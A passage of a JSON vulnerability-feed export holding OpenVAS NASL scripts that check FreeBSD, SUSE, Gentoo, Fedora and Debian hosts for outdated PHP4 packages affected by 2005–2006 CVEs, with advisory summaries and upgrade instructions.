freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n mod_php4-twig\n php4-cgi\n php4-cli\n php4-dtc\n php4-horde\n php4-nms\n php4\n mod_php\n mod_php4\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://secunia.com/advisories/17371/\nhttp://www.vuxml.org/freebsd/6821a2db-4ab7-11da-932d-00055d790c25.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(55777);\n script_version(\"$Revision: 4128 $\");\n script_cve_id(\"CVE-2005-2491\", \"CVE-2005-3319\", \"CVE-2005-3353\", \"CVE-2005-3388\",\n \"CVE-2005-3389\", \"CVE-2005-3390\", \"CVE-2005-3391\", \"CVE-2005-3392\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-22 07:37:51 +0200 (Thu, 22 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"PHP -- multiple vulnerabilities\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"mod_php4-twig\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.4.1\")<0) {\n txt += 'Package mod_php4-twig version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php4-cgi\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.4.1\")<0) {\n txt += 'Package php4-cgi version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php4-cli\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.4.1\")<0) {\n txt += 'Package php4-cli version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php4-dtc\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.4.1\")<0) {\n txt += 'Package php4-dtc version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php4-horde\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.4.1\")<0) {\n txt += 'Package php4-horde version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php4-nms\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.4.1\")<0) {\n txt += 'Package php4-nms version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php4\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.4.1\")<0) {\n txt += 'Package php4 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"mod_php\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4\")>=0 && revcomp(a:bver, b:\"4.4.1,1\")<0) {\n txt += 'Package mod_php version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"mod_php4\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4\")>=0 && revcomp(a:bver, b:\"4.4.1,1\")<0) {\n txt += 'Package mod_php4 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:40:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3353", "CVE-2005-3392", "CVE-2005-3389", "CVE-2005-3391", "CVE-2005-3390", "CVE-2005-3883"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache-mod_php4\n php4-servlet\n mod_php4-servlet\n php4-pear\n php4-sysvshm\n php4-exif\n mod_php4-core\n php4-mbstring\n php4\n apache2-mod_php4\n php4-fastcgi\n php4-session\n php4-recode\n php4-devel\n php4-mysql\n php4-imap\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5014967 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:136141256231065581", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065581", "type": "openvas", "title": "SLES9: Security update for PHP4", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5014967.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for PHP4\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache-mod_php4\n php4-servlet\n mod_php4-servlet\n php4-pear\n php4-sysvshm\n php4-exif\n mod_php4-core\n php4-mbstring\n php4\n apache2-mod_php4\n php4-fastcgi\n php4-session\n php4-recode\n php4-devel\n php4-mysql\n php4-imap\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5014967 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65581\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2005-3353\", \"CVE-2005-3389\", \"CVE-2005-3390\", \"CVE-2005-3391\", \"CVE-2005-3392\", \"CVE-2005-3883\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"SLES9: Security update for PHP4\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"apache-mod_php4\", rpm:\"apache-mod_php4~4.3.4~43.46.8\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-26T08:56:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3353", "CVE-2005-3392", "CVE-2005-3389", "CVE-2005-3391", "CVE-2005-3390", "CVE-2005-3883"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache-mod_php4\n php4-servlet\n mod_php4-servlet\n php4-pear\n php4-sysvshm\n php4-exif\n mod_php4-core\n php4-mbstring\n php4\n apache2-mod_php4\n php4-fastcgi\n php4-session\n php4-recode\n php4-devel\n php4-mysql\n php4-imap\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5014967 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:65581", "href": "http://plugins.openvas.org/nasl.php?oid=65581", "type": "openvas", "title": "SLES9: Security update for PHP4", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5014967.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for PHP4\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache-mod_php4\n php4-servlet\n mod_php4-servlet\n php4-pear\n php4-sysvshm\n php4-exif\n mod_php4-core\n php4-mbstring\n php4\n apache2-mod_php4\n php4-fastcgi\n php4-session\n php4-recode\n php4-devel\n php4-mysql\n php4-imap\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5014967 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65581);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2005-3353\", \"CVE-2005-3389\", \"CVE-2005-3390\", \"CVE-2005-3391\", \"CVE-2005-3392\", \"CVE-2005-3883\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"SLES9: Security update for PHP4\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"apache-mod_php4\", rpm:\"apache-mod_php4~4.3.4~43.46.8\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3388", "CVE-2005-3392", "CVE-2005-3054", "CVE-2005-3389", "CVE-2005-3319", "CVE-2005-3391", "CVE-2005-3390"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200511-08.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:55857", "href": "http://plugins.openvas.org/nasl.php?oid=55857", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200511-08 (PHP)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PHP suffers from multiple issues, resulting in security functions bypass,\nlocal Denial of service, cross-site scripting or PHP variables overwrite.\";\ntag_solution = \"All PHP users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose dev-php/php\n\nAll mod_php users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose dev-php/mod_php\n\nAll php-cgi users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose dev-php/php-cgi\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200511-08\nhttp://bugs.gentoo.org/show_bug.cgi?id=107602\nhttp://bugs.gentoo.org/show_bug.cgi?id=111032\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200511-08.\";\n\n \n\nif(description)\n{\n script_id(55857);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2005-3054\", \"CVE-2005-3319\", \"CVE-2005-3388\", \"CVE-2005-3389\", \"CVE-2005-3390\", \"CVE-2005-3391\", \"CVE-2005-3392\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200511-08 (PHP)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"dev-php/php\", unaffected: make_list(\"rge 4.3.11-r4\", \"ge 4.4.0-r4\"), vulnerable: make_list(\"lt 4.4.0-r4\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"dev-php/mod_php\", unaffected: make_list(\"rge 4.3.11-r4\", \"ge 4.4.0-r8\"), vulnerable: make_list(\"lt 4.4.0-r8\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"dev-php/php-cgi\", unaffected: make_list(\"rge 4.3.11-r5\", \"ge 4.4.0-r5\"), vulnerable: make_list(\"lt 4.4.0-r5\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-06-25T13:44:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3388"], "description": "The remote host is missing an update for the ", "modified": "2020-06-24T00:00:00", "published": "2020-06-23T00:00:00", "id": "OPENVAS:1361412562310877982", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310877982", "type": "openvas", "title": "Fedora: Security Advisory for ca-certificates (FEDORA-2020-fb144e7de5)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.877982\");\n script_version(\"2020-06-24T03:42:18+0000\");\n script_cve_id(\"CVE-2005-3388\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-06-24 03:42:18 +0000 (Wed, 24 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-23 03:19:58 +0000 (Tue, 23 Jun 2020)\");\n script_name(\"Fedora: Security Advisory for ca-certificates (FEDORA-2020-fb144e7de5)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC32\");\n\n script_xref(name:\"FEDORA\", value:\"2020-fb144e7de5\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PIRZJHM6UDNWNHZ3PCMEZ2YUK3CWY2UE\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ca-certificates'\n package(s) announced via the FEDORA-2020-fb144e7de5 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This package contains the set of CA certificates chosen by the\nMozilla Foundation for use with the Internet PKI.\");\n\n script_tag(name:\"affected\", value:\"'ca-certificates' package(s) on Fedora 32.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC32\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ca-certificates\", rpm:\"ca-certificates~2020.2.41~1.1.fc32\", rls:\"FC32\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2017-07-24T12:50:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3353", "CVE-2006-3017", "CVE-2006-4482", "CVE-2006-5465"], "description": "The remote host is missing an update to php4\nannounced via advisory DSA 1206-1.\n\nSeveral remote vulnerabilities have been discovered in PHP, a\nserver-side, HTML-embedded scripting language, which may lead to the\nexecution of arbitrary code. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\nCVE-2005-3353\n\nTim Starling discovered that missing input sanitising in the EXIF\nmodule could lead to denial of service.\n\nCVE-2006-3017\n\nStefan Esser discovered a security-critical programming error in the\nhashtable implementation of the internal Zend engine.\n\nCVE-2006-4482\n\nIt was discovered that str_repeat() and wordwrap() functions perform\ninsufficient checks for buffer boundaries on 64 bit systems, which\nmight lead to the execution of arbitrary code.\n\nCVE-2006-5465\n\nStefan Esser discovered a buffer overflow in the htmlspecialchars()\nand htmlentities(), which might lead to the execution of arbitrary\ncode.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:57567", "href": "http://plugins.openvas.org/nasl.php?oid=57567", "type": "openvas", "title": "Debian Security Advisory DSA 1206-1 (php4)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1206_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1206-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) these problems have been fixed in\nversion 4:4.3.10-18. Builds for hppa and m68k will be provided later\nonce they are available.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 4:4.4.4-4 of php4 and version 5.1.6-6 of php5.\n\nWe recommend that you upgrade your php4 packages.\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201206-1\";\ntag_summary = \"The remote host is missing an update to php4\nannounced via advisory DSA 1206-1.\n\nSeveral remote vulnerabilities have been discovered in PHP, a\nserver-side, HTML-embedded scripting language, which may lead to the\nexecution of arbitrary code. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\nCVE-2005-3353\n\nTim Starling discovered that missing input sanitising in the EXIF\nmodule could lead to denial of service.\n\nCVE-2006-3017\n\nStefan Esser discovered a security-critical programming error in the\nhashtable implementation of the internal Zend engine.\n\nCVE-2006-4482\n\nIt was discovered that str_repeat() and wordwrap() functions perform\ninsufficient checks for buffer boundaries on 64 bit systems, which\nmight lead to the execution of arbitrary code.\n\nCVE-2006-5465\n\nStefan Esser discovered a buffer overflow in the htmlspecialchars()\nand htmlentities(), which might lead to the execution of arbitrary\ncode.\";\n\n\nif(description)\n{\n script_id(57567);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:17:11 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2005-3353\", \"CVE-2006-3017\", \"CVE-2006-4482\", \"CVE-2006-5465\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1206-1 (php4)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"php4-pear\", ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4\", ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache-mod-php4\", ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php4\", ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-cgi\", ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-cli\", ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-common\", ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-curl\", ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-dev\", ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-domxml\", ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-gd\", ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-imap\", ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-ldap\", ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-mcal\", ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-mhash\", ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-mysql\", ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-odbc\", ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-recode\", ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-snmp\", ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-sybase\", ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-xslt\", ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": 